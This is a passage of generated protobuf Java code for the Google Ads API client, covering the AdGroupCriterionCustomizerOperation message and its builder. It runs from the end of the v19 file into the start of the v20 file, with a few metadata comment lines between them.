com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.Builder.class); } // Construct using com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.newBuilder() private Builder() { } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createBuilder_ != null) { createBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation build() { com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation buildPartial() { com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result = new com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result) { int from_bitField0_ = bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result) { 
      // (continuation of buildPartialOneofs, opened on the previous line)
      // Copy the oneof discriminator and value into the message under
      // construction; when `create` is backed by a nested builder, build it
      // here so the finished message holds an immutable submessage.
      result.operationCase_ = operationCase_;
      result.operation_ = this.operation_;
      if (operationCase_ == 1 &&
          createBuilder_ != null) {
        result.operation_ = createBuilder_.build();
      }
    }

    @java.lang.Override
    public Builder clone() {
      return super.clone();
    }
    // The setField/clearField/clearOneof/setRepeatedField/addRepeatedField
    // overrides below delegate straight to GeneratedMessageV3.Builder; they
    // exist only so generated subclasses return the covariant Builder type.
    @java.lang.Override
    public Builder setField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        java.lang.Object value) {
      return super.setField(field, value);
    }
    @java.lang.Override
    public Builder clearField(
        com.google.protobuf.Descriptors.FieldDescriptor field) {
      return super.clearField(field);
    }
    @java.lang.Override
    public Builder clearOneof(
        com.google.protobuf.Descriptors.OneofDescriptor oneof) {
      return super.clearOneof(oneof);
    }
    @java.lang.Override
    public Builder setRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        int index, java.lang.Object value) {
      return super.setRepeatedField(field, index, value);
    }
    @java.lang.Override
    public Builder addRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        java.lang.Object value) {
      return super.addRepeatedField(field, value);
    }
    /**
     * Dynamic-dispatch merge: narrows to the typed overload when {@code other}
     * is the same generated message type, otherwise falls back to the
     * reflective merge in the superclass.
     */
    @java.lang.Override
    public Builder mergeFrom(com.google.protobuf.Message other) {
      if (other instanceof com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) {
        return mergeFrom((com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation)other);
      } else {
        super.mergeFrom(other);
        return this;
      }
    }

    /**
     * Typed merge. For the {@code operation} oneof, whichever case is set on
     * {@code other} overwrites this builder's case: CREATE merges into (or
     * replaces) the submessage, REMOVE replaces the stored resource-name
     * object directly. Unknown fields are merged last.
     */
    public Builder mergeFrom(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation other) {
      if (other == com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.getDefaultInstance()) return this;
      switch (other.getOperationCase()) {
        case CREATE: {
          mergeCreate(other.getCreate());
          break;
        }
        case REMOVE: {
          // Copy the raw holder (String or ByteString) without forcing a
          // UTF-8 decode.
          operationCase_ = 2;
          operation_ = other.operation_;
          onChanged();
          break;
        }
        case OPERATION_NOT_SET: {
          break;
        }
      }
      this.mergeUnknownFields(other.getUnknownFields());
      onChanged();
      return this;
    }

    // This message declares no required fields, so any instance is valid.
    @java.lang.Override
    public final boolean isInitialized() {
      return true;
    }
@java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getCreateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); operationCase_ = 2; operation_ = s; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder> createBuilder_; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer getCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } else { if (operationCase_ == 1) { return createBuilder_.getMessage(); } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate(com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { createBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate( com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder builderForValue) { if (createBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { createBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder mergeCreate(com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance()) { operation_ = com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.newBuilder((com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { createBuilder_.mergeFrom(value); } else { createBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder clearCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } createBuilder_.clear(); } return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder getCreateBuilder() { return getCreateFieldBuilder().getBuilder(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if ((operationCase_ == 1) && (createBuilder_ != null)) { return createBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder> getCreateFieldBuilder() { if (createBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } createBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder>( (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return createBuilder_; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 
[(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ @java.lang.Override public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ @java.lang.Override public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } else { return (java.lang.String) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ @java.lang.Override public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... 
}</code> * @param value The remove to set. * @return This builder for chaining. */ public Builder setRemove( java.lang.String value) { if (value == null) { throw new NullPointerException(); } operationCase_ = 2; operation_ = value; onChanged(); return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return This builder for chaining. */ public Builder clearRemove() { if (operationCase_ == 2) { operationCase_ = 0; operation_ = null; onChanged(); } return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The bytes for remove to set. * @return This builder for chaining. 
*/ public Builder setRemoveBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); operationCase_ = 2; operation_ = value; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) private static final com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation(); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> PARSER = new com.google.protobuf.AbstractParser<AdGroupCriterionCustomizerOperation>() { @java.lang.Override public AdGroupCriterionCustomizerOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new 
com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
// --- NOTE(review): the three rows below are dataset metadata (repo id, file
// size, file path) leaked into this file by an upstream concatenation step;
// they are not Java source. Preserved as comments so the file stays parseable.
// googleads/google-ads-java
// 35,915
// google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/AdGroupCriterionCustomizerOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/ad_group_criterion_customizer_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation} */ public final class AdGroupCriterionCustomizerOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) AdGroupCriterionCustomizerOperationOrBuilder { private static final long serialVersionUID = 0L; // Use AdGroupCriterionCustomizerOperation.newBuilder() to construct. private AdGroupCriterionCustomizerOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdGroupCriterionCustomizerOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new AdGroupCriterionCustomizerOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.Builder.class); } private int operationCase_ = 0; 
  // Holder for whichever member of the `operation` oneof is currently set:
  // an AdGroupCriterionCustomizer message when operationCase_ == 1, or a
  // String/ByteString resource name when operationCase_ == 2.
  @SuppressWarnings("serial")
  private java.lang.Object operation_;

  /** Identifies which member of the {@code operation} oneof is populated. */
  public enum OperationCase
      implements com.google.protobuf.Internal.EnumLite,
          com.google.protobuf.AbstractMessage.InternalOneOfEnum {
    CREATE(1),
    REMOVE(2),
    OPERATION_NOT_SET(0);
    private final int value;
    private OperationCase(int value) {
      this.value = value;
    }
    /**
     * @param value The number of the enum to look for.
     * @return The enum associated with the given number.
     * @deprecated Use {@link #forNumber(int)} instead.
     */
    @java.lang.Deprecated
    public static OperationCase valueOf(int value) {
      return forNumber(value);
    }

    public static OperationCase forNumber(int value) {
      switch (value) {
        case 1: return CREATE;
        case 2: return REMOVE;
        case 0: return OPERATION_NOT_SET;
        // Unrecognized field number: callers receive null rather than an
        // exception.
        default: return null;
      }
    }
    public int getNumber() {
      return this.value;
    }
  };

  public OperationCase
  getOperationCase() {
    return OperationCase.forNumber(
        operationCase_);
  }

  public static final int CREATE_FIELD_NUMBER = 1;
  /**
   * <pre>
   * Create operation: No resource name is expected for the new ad group
   * criterion customizer.
   * </pre>
   *
   * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code>
   * @return Whether the create field is set.
   */
  @java.lang.Override
  public boolean hasCreate() {
    return operationCase_ == 1;
  }
  /**
   * <pre>
   * Create operation: No resource name is expected for the new ad group
   * criterion customizer.
   * </pre>
   *
   * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code>
   * @return The create, or the type's default instance when the oneof holds
   *     a different case.
   */
  @java.lang.Override
  public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer getCreate() {
    if (operationCase_ == 1) {
       return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_;
    }
    return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance();
  }
  /**
   * <pre>
   * Create operation: No resource name is expected for the new ad group
   * criterion customizer.
* </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } public static final int REMOVE_FIELD_NUMBER = 2; /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. 
*/ public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, operation_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, operation_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation)) { return super.equals(obj); } com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation other = (com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) obj; if (!getOperationCase().equals(other.getOperationCase())) return false; 
switch (operationCase_) { case 1: if (!getCreate() .equals(other.getCreate())) return false; break; case 2: if (!getRemove() .equals(other.getRemove())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); switch (operationCase_) { case 1: hash = (37 * hash) + CREATE_FIELD_NUMBER; hash = (53 * hash) + getCreate().hashCode(); break; case 2: hash = (37 * hash) + REMOVE_FIELD_NUMBER; hash = (53 * hash) + getRemove().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom(byte[] data) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.class, 
com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.Builder.class); } // Construct using com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.newBuilder() private Builder() { } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createBuilder_ != null) { createBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation build() { com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation buildPartial() { com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result = new com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result) { int from_bitField0_ = bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result) { 
